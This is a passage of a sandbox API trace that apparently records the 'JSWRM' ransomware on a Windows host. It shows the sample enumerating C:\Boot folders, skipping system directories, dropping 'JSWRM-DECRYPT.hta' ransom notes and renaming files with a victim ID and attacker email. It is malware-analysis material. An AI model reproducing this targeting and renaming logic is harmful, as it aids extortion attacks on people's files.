lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.307] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.307] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.307] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.308] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.308] CloseHandle (hObject=0xffffffff) returned 1 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0064.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0064.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.308] MoveFileW (lpExistingFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0064.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.309] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfe2abf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cfe2abf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.309] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.309] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfe2abf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cfe2abf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.309] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0064.309] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="...") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="windows") returned -1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="recovery") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="perflogs") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="documents and settings") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="$RECYCLE.BIN") returned 1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="system volume information") returned -1 [0064.310] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="msocache") returned 1 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232c80 [0064.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.310] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0xffffffff [0064.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0064.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232e20 [0064.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.311] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sr-latn-cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.312] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.312] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.313] CloseHandle (hObject=0x450) returned 1 [0064.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0064.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x2330f8 [0064.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.315] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0x20 [0064.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0064.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.315] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0064.315] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.315] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.315] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.315] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.315] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.315] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.316] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.316] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0064.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0064.316] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.317] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9789639219133776) returned 0 [0064.317] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.317] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.317] CloseHandle (hObject=0xffffffff) returned 1 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0064.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225bb0 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225bb0 | out: hHeap=0x1e0000) returned 1 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.318] MoveFileW (lpExistingFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0064.319] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfe2abf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cfe2abf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.319] lstrcmpiW 